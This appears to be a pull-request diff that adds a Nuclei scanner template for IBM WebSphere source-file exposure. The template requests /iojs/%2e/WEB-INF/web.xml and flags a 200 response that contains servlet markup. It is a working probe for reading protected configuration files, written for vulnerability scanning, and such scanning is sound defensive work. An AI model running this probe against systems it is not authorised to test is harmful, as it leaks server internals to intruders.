Merge pull request #7288 from projectdiscovery/pussycat0x-patch-6
IBM WebSphere application - Source File Exposurepatch-1
commit
9c7ef7c0ce
|
@ -0,0 +1,31 @@
|
||||||
|
id: ibm-websphere-xml
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: IBM WebSphere Application - Source File Exposure
|
||||||
|
author: r3nz0
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Disclose application specific files contained within the war file, including files under the web-inf and meta-inf directories.
|
||||||
|
reference:
|
||||||
|
- https://www.acunetix.com/vulnerabilities/web/ibm-websphere-weblogic-application-source-file-exposure/
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
tags: ibm,websphere,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/iojs/%2e/WEB-INF/web.xml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</web-app>"
|
||||||
|
- "<servlet>"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue